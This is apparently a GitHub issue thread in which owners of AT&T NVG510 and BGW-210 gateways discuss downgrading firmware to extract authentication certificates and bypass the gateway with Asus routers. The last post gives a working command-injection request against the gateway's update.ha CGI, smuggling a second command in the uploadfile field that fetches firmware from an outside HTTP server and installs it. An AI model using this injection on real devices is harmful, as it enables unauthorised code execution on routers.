Downgrading from 9.1.0h9d61 to 9.0.6h2d30 fails

[euskode]

Thanks for putting this guide together for us!

I just tried downgrading an NVG510 running 9.1.0h9d61 to 9.0.6h2d30 via the binary in the repo and got a Firmware image is invalid error in the UI.

The following was logged by the device on this attempt:

P0000-00-00T00:03:43 L3 fwinsth[301]: Firmware image is not signed
P0000-00-00T00:03:43 L5 fwinsth[301]: Signed image validation failed with status -1
P0000-00-00T00:03:43 L5 sdb[388]: firmware installation failure - image is invalid
P0000-00-00T00:03:43 L5 cwmp[1440]: DSLF_WanMgmtChg path[system.firmware.install-state] val[Idle]
P0000-00-00T00:03:43 L5 cwmp[1440]: DSLF_WanMgmtChg path[system.firmware.install-state] val[Invalid image]

I also tried the binaries available for download on DSLReports with the same outcome.

Do you know whether signed versions of the vulnerable firmware are available?

I'm starting to think that it may not be possible to downgrade from the version this eBay-purchased router is running to the required one(s) but I'm not entirely sure how to establish that.

Any assistance you can provide here would be much appreciated!

[nitewulf]

I'm in the process of researching options to get rid of that POS gateway. My AiMesh setup worked perfectly fine with spectrum... almost tempted to go back. anyway. I also found this guide:

https://pyther.net/2020/05/03/bypass-att-gateway-openwrt.html

In the near future, I'm going to attempt to use this asus-merlin guide because it seems easier and from the link I posted there looks to be an option of sniffing those auth packets and passing them through with some script.

Curious if you got this working and if not hope that suggestion helps.

[adamjungers]

I got it working with a asus ac68u. In the dslreports forums there was someone that compiled the software for a newer router but for now, this works for me. Definitely needs more code than what is in this tutorial and edits to some of these scripts. Let me know if I can help, if you get the ac68u, I can walk you through it on a zoom call or similar.

…

On Wed, Aug 19, 2020 at 11:07 AM Scott Manktelow ***@***.***> wrote: I'm in the process of researching options to get rid of that POS gateway. My AiMesh setup worked perfectly fine with spectrum... almost tempted to go back. anyway. I also found this guide: https://pyther.net/2020/05/03/bypass-att-gateway-openwrt.html In the near future, I'm going to attempt to use this asus-merlin guide because it seems easier and from the link I posted there looks to be an option of sniffing those auth packets and passing them through with some script. Curious if you got this working and if not hope that suggestion helps. — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#6 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AQLSB2VGUN7UDSJI6UOVXLLSBPTBFANCNFSM4MJGAKHA> .

[nitewulf]

Thanks for the offer. I have an ac86u currently as the main router (it replaced a 68u - i thought maybe the newer router would work better with passthrough... wrong). So if it matters I can always use the 68. Both are running merlin.

What do you mean that for now this worked for you? Were you able to get the NVG510 downgraded to get the certs from it?

[adamjungers]

I pulled my certs from a BGW-210, not the NVG, but it’s pretty much the same process. The old FW files to downgrade to should be in the tutorial. Getting the certs was the easiest part in my opinion..

…

On Wed, Aug 19, 2020 at 11:27 AM Scott Manktelow ***@***.***> wrote: Thanks for the offer. I have an ac86u currently as the main router (it replaced a 68u - i thought maybe the newer router would work better with passthrough... wrong). So if it matters I can always use the 68. Both are running merlin. What do you mean that for now this worked for you? Were you able to get the NVG510 downgraded to get the certs from it? — You are receiving this because you commented. Reply to this email directly, view it on GitHub <#6 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AQLSB2XXKXPJUTAWUVPQNZTSBPVOFANCNFSM4MJGAKHA> .

[adamjungers]

I can look into the ac86u, but I’m pretty sure it’s a different armV on there.. let me see if i can find the right packages. I can’t recompile them, but I think there are some out here for the 86.

…

On Wed, Aug 19, 2020 at 11:29 AM ADAM JUNGERS ***@***.***> wrote: I pulled my certs from a BGW-210, not the NVG, but it’s pretty much the same process. The old FW files to downgrade to should be in the tutorial. Getting the certs was the easiest part in my opinion.. On Wed, Aug 19, 2020 at 11:27 AM Scott Manktelow ***@***.***> wrote: > > > Thanks for the offer. I have an ac86u currently as the main router (it > replaced a 68u - i thought maybe the newer router would work better with > passthrough... wrong). So if it matters I can always use the 68. Both are > running merlin. > > > What do you mean that for now this worked for you? Were you able to get > the NVG510 downgraded to get the certs from it? > > > > > — > You are receiving this because you commented. > > > Reply to this email directly, view it on GitHub > <#6 (comment)>, or > unsubscribe > <https://github.com/notifications/unsubscribe-auth/AQLSB2XXKXPJUTAWUVPQNZTSBPVOFANCNFSM4MJGAKHA> > . > > >

[univerio]

9.1.0h9d61 has fixed that exact vulnerability, but a very similar variation on the same vulnerability is still possible. However, 9.1.0h9d61 has apparently also blocked access to /dev/mtdblock4 (reading it gives you a 64-block file of 0xFF) so direct extraction is not possible, but I was able to downgrade to 9.0.6h2d30 by doing following:

• Serve nbxv9.0.6h2d30.bin using any HTTP server (in the same way as the backdoor.nvg510.sh file)
• Grab the nonce in the same way
• Run curl -v http://192.168.1.254/cgi-bin/update.ha -F nonce=<nonce> -F Cancel=Cancel -F uploadfile='a && curl -o /tmp/fw http://<your HTTP server IP>:8000/nbxv9.0.6h2d30.bin && fwmgr -i /tmp/fw'
• Reboot

From there everything is the same and I was able to decode the cert successfully.